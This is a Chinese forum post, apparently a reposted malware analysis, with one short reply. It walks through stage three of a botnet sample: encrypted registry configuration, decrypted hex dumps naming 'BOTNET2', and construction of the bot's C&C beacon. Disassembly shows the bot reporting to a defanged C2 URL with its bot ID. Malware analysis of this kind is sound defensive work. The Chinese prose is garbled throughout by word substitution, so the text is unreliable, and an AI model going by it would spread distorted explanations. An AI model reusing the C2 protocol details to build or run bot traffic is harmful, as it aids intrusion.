本帖最后由 楚轩 于 2015-9-12 15:30 编辑
呵呵  {:1_930:}
第三阶段
那个阶段歹意硬件将创立一个初初化C&C恳求的PAYLOAD,并将PAYLOAD发送。第三阶段中PAYLOAD的创立战歹意硬件的逻辑的具体信息以下所述。
歹意硬件管帐算一些有闭计算机的特定命据(如在第两阶段所述的),并将后果与保管在:
[Asm] 纯文本查看 复制代码 “KEY_CURRENT_USER\Software\Classes\CLSID\{[computer_unique_guid]}”
中的数据停止比拟。假如相等,则歹意硬件履行到下一个阶段。
存储在注册表中的数据“HKEY_CURRENT_USER\ Software\Classes\CLSID\{[computer_unique_guid]}”罗列以下。
例如,在测试机上,数据的大小是0×170,存储在注册表中的减稀数据为:
[Asm] 纯文本查看 复制代码 00854B78 5F 1D B6 44 5B 87 A7 2E 74 81 51 7F 34 CA CC 9D _.|D[ço.t.Q.4-|.00854B88 FC 74 61 04 C2 61 9E 99 E5 A7 64 02 8E D2 79 05 nta.-aPÖsod.Ä-y.00854B98 68 41 E1 33 96 C7 B7 EB 83 35 07 43 47 1A A8 74 hAß3û|+da5.CG.¿t00854BA8 F7 CC B0 27 73 7A 7E 63 60 D7 5B AB 43 1B 41 65 ˜||'sz~c`+[½C.Ae00854BB8 7F D1 A6 8B 85 B1 DE E4 B2 B5 A7 7E 74 B6 44 14 .-aïà||S||o~t|D.00854BC8 B5 B8 D3 56 D3 0A 72 CC 62 BF 64 F4 3F 4D F1 D8 |++V+.r|b+d(?M±+00854BD8 84 2B 45 B8 DB BA 22 C2 B5 95 34 FA 69 85 A6 01 ä+E+||"-|ò4·iàa.00854BE8 02 80 29 90 60 A9 11 13 C3 77 31 6E 06 23 BA 3A .Ç).`¬..+w1n.#|:00854BF8 64 D5 78 FA 2C E3 E5 3A 2B 18 4C 1F 74 31 B3 25 d+x·,ps:+.L.t1|%00854C08 BF 78 2C 45 4F 71 F6 F1 B4 5D 16 E3 CD 40 60 B8 +x,EOq÷±|].p-@`+00854C18 D9 7B CE AF 87 4F 88 75 FB CC DB 8F AA 33 CF 46 +{+»çOêuv||.¬3-F00854C28 3D 5D 7C 46 85 B5 92 33 B7 B8 E8 E9 5D 88 17 31 =]|Fà|Æ3++FT]ê.100854C38 46 76 F4 EA 05 D2 71 04 55 B0 BF B3 A1 E9 9C BF Fv(O.-q.U|+|íT£+00854C48 E7 E6 5A 51 C5 F1 4A DF CF 46 8B 4F 54 57 57 4F tμZQ+±Jˉ-FïOTWWO00854C58 6E EF 29 C1 BC C0 32 14 B5 3D 84 4C 87 7A 73 BA nn)-++2.|=äLçzs|00854C68 40 B2 06 B7 42 85 7C 44 65 1E EE 69 2F 7E 37 B8 @|.+Bà|De.ei/~7+00854C78 E5 A6 CC 26 06 9D 32 B3 71 7E D0 13 45 CF 01 D9 sa|&..2|q~-.E-.+00854C88 77 DA 8C 8E 90 3D 0E D1 F7 FE B1 24 99 20 89 C7 w+îÄ.=.-˜||$Ö ë|00854C98 41 1D DA 62 66 08 AF 48 C9 F8 5C F8 3D 83 7E 92 A.+bf.»H+°\°=a~Æ00854CA8 BF 8C 18 49 CA 81 CE 77 48 93 04 A3 B1 9D 07 60 +î.I-.+wHô.ú|..`00854CB8 5B CE A7 0D 23 09 B6 8D 7E 2E B9 B9 1A 73 3E 84 [+o.#.|.~.||.s>ä00854CC8 21 9C EF 83 41 66 72 E1 61 4A 4D 62 4E 0E FF FE !£naAfrßaJMbN. |00854CD8 C9 F2 15 3B BC 38 11 A2 2B 0C 35 CF F4 EB 35 E5 +=.;+8.ó+.5-(d5s
解稀后的数据为:
[Asm] 纯文本查看 复制代码 00854E90 00 00 00 00 67 01 00 00 A6 69 46 69 72 73 74 54 ....g...aiFirstT00854EA0 69 6D 65 01 6E 6D 6F 64 75 6C 65 73 46 65 74 63 ime.nmodulesFetc00854EB0 68 65 64 00 66 48 61 73 68 50 45 50 8A 15 4F AE hed.fHashPEPè.O«00854EC0 3B 78 B4 8D B1 71 C4 C9 49 99 E0 C0 6C 73 7A 42 ;x|.|q-+IÖa+lszB00854ED0 6F 74 6E 65 74 4E 61 6D 65 67 42 4F 54 4E 45 54 otnetNamegBOTNET00854EE0 32 6D 73 7A 49 6E 73 74 61 6C 6C 50 61 74 68 78 2mszInstallPathx00854EF0 55 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E UC:\Documents an00854F00 64 20 53 65 74 74 69 6E 67 73 5C 69 5C 41 70 70 d Settings\i\App00854F10 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 4D 66 lication Data\Mf00854F20 7A 78 41 48 43 62 5C 48 51 48 4B 57 62 73 76 5C zxAHCb\HQHKWbsv\00854F30 50 4D 71 4C 4D 4B 74 6A 5C 6F 50 51 56 4E 69 52 PMqLMKtj\oPQVNiR00854F40 67 73 2E 65 78 65 6C 77 49 6E 73 74 61 6C 6C 50 gs.exelwInstallP00854F50 61 74 68 58 AA 43 00 3A 00 5C 00 44 00 6F 00 63 athX¬C.:.\.D.o.c00854F60 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 .u.m.e.n.t.s. .a00854F70 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 .n.d. .S.e.t.t.i00854F80 00 6E 00 67 00 73 00 5C 00 69 00 5C 00 41 00 70 .n.g.s.\.i.\.A.p00854F90 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F .p.l.i.c.a.t.i.o00854FA0 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 4D .n. .D.a.t.a.\.M00854FB0 00 66 00 7A 00 78 00 41 00 48 00 43 00 62 00 5C .f.z.x.A.H.C.b.\00854FC0 00 48 00 51 00 48 00 4B 00 57 00 62 00 73 00 76 .H.Q.H.K.W.b.s.v00854FD0 00 5C 00 50 00 4D 00 71 00 4C 00 4D 00 4B 00 74 .\.P.M.q.L.M.K.t00854FE0 00 6A 00 5C 00 6F 00 50 00 51 00 56 00 4E 00 69 .j.\.o.P.Q.V.N.i00854FF0 00 52 00 67 00 73 00 2E 00 65 00 78 00 65 00 00 .R.g.s...e.x.e.. bytes 0 - 3 zeroes,bytes 4 - 7 thelength of the databytes 8 - ? dataitself.
接着,数据被符号化:
[Asm] 纯文本查看 复制代码 00854D08 01 00 00 00 00 00 00 00 8A 15 4F AE 3B 78 B4 8D ........è.O«;x|.00854D18 B1 71 C4 C9 49 99 E0 C0 42 4F 54 4E 45 54 32 00 |q-+IÖa+BOTNET2.............................................................................00854E18 00 00 00 00 00 00 00 00 00 00 00 00 00 43 3A 5C .............C:\00854E28 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 Documents and Se00854E38 74 74 69 6E 67 73 5C 69 5C 41 70 70 6C 69 63 61 ttings\i\Applica00854E48 74 69 6F 6E 20 44 61 74 61 5C 4D 66 7A 78 41 48 tion Data\MfzxAH00854E58 43 62 5C 48 51 48 4B 57 62 73 76 5C 50 4D 71 4C Cb\HQHKWbsv\PMqL00854E68 4D 4B 74 6A 5C 6F 50 51 56 4E 69 52 67 73 2E 65 MKtj\oPQVNiRgs.e00854E78 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 xe..........................................................................................00854F28 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 ..C.:.\.D.o.c.u.00854F38 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 m.e.n.t.s. .a.n.00854F48 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 d. .S.e.t.t.i.n.00854F58 67 00 73 00 5C 00 69 00 5C 00 41 00 70 00 70 00 g.s.\.i.\.A.p.p.00854F68 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 l.i.c.a.t.i.o.n.00854F78 20 00 44 00 61 00 74 00 61 00 5C 00 4D 00 66 00 .D.a.t.a.\.M.f.00854F88 7A 00 78 00 41 00 48 00 43 00 62 00 5C 00 48 00 z.x.A.H.C.b.\.H.00854F98 51 00 48 00 4B 00 57 00 62 00 73 00 76 00 5C 00 Q.H.K.W.b.s.v.\.00854FA8 50 00 4D 00 71 00 4C 00 4D 00 4B 00 74 00 6A 00 P.M.q.L.M.K.t.j.00854FB8 5C 00 6F 00 50 00 51 00 56 00 4E 00 69 00 52 00 \.o.P.Q.V.N.i.R.00854FC8 67 00 73 00 2E 00 65 00 78 00 65 00 00 00 00 00 g.s...e.x.e.....
对存储在“HKEY_CURRENT_USER\Software\Classes\CLSID\{[computer_unique_guid]}\1″中的数据停止相反的操纵。
域名称号战经常使用的恳求页里被包括在一个风趣的构造中并被存储在当地的一个相似于数组的构造中:
[Asm] 纯文本查看 复制代码 00855EF8 90 67 85 00 D0 67 85 00 10 68 85 00 48 68 85 00 .gà.-gà..hà.Hhà.00855F08 2F 6E 65 74 72 65 70 6F 72 74 2E 70 68 70 00 00 /netreport.php..
接着,将挪用上面那个风趣函数:
[Asm] 纯文本查看 复制代码 .text:0040FB1B 50 push eax ;void *.text:0040FB1C 51 push ecx ;int;db 'I-C957A26036A04#972958A65880B55A0EBD5559078C1735',0 ;this is computer_name#md5hash as described in the dump.txt.text:0040FB1D 57 push edi ;int;'hxxp://soft.kcssoft.biz/netreport.php',0.text:0040FB1E E8 FD FE FF FF call c2
歹意硬件在那个函数中做的第一件工作便是创立恳求C&C效劳器的PAYLOAD。
例如,在测试机上,杂文本的PAYLOAD(少度为0x123)的第一局部为:
[Asm] 纯文本查看 复制代码 00856A90 82 A7 69 6C 70 73 7A 42 6F 74 49 44 78 30 49 2D éoilpszBotIDx0I-00856AA0 43 39 35 37 41 32 36 30 33 36 41 30 34 23 39 37 C957A26036A04#9700856AB0 32 39 35 38 41 36 35 38 38 30 42 35 35 41 30 45 2958A65880B55A0E00856AC0 42 44 35 35 35 39 30 37 38 43 31 37 33 35 6B 6C BD5559078C1735kl00856AD0 70 73 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E 30 pszVersiong2.0.000856AE0 2E 30 68 6D 61 69 6E 54 79 70 65 00 67 73 75 62 .0hmainType.gsub00856AF0 54 79 70 65 00 67 42 69 74 6E 65 73 73 18 20 6B Type.gBitness. k00856B00 64 77 54 69 6D 65 73 74 61 6D 70 00 64 44 61 74 dwTimestamp.dDat00856B10 61 A2 66 4C 65 6E 67 74 68 00 66 6C 70 44 61 74 aófLength.flpDat00856B20 61 40 A7 69 6C 70 73 7A 42 6F 74 49 44 78 30 49 a@oilpszBotIDx0I00856B30 2D 43 39 35 37 41 32 36 30 33 36 41 30 34 23 39 -C957A26036A04#900856B40 37 32 39 35 38 41 36 35 38 38 30 42 35 35 41 30 72958A65880B55A000856B50 45 42 44 35 35 35 39 30 37 38 43 31 37 33 35 6B EBD5559078C1735k00856B60 6C 70 73 7A 56 65 72 73 69 6F 6E 67 32 2E 30 2E lpszVersiong2.0.00856B70 30 2E 30 68 6D 61 69 6E 54 79 70 65 00 67 73 75 0.0hmainType.gsu00856B80 62 54 79 70 65 01 67 42 69 74 6E 65 73 73 18 20 bType.gBitness.00856B90 6B 64 77 54 69 6D 65 73 74 61 6D 70 00 64 44 61 kdwTimestamp.d
| 
发表于 2015-9-12 15:21
看不懂也要顶
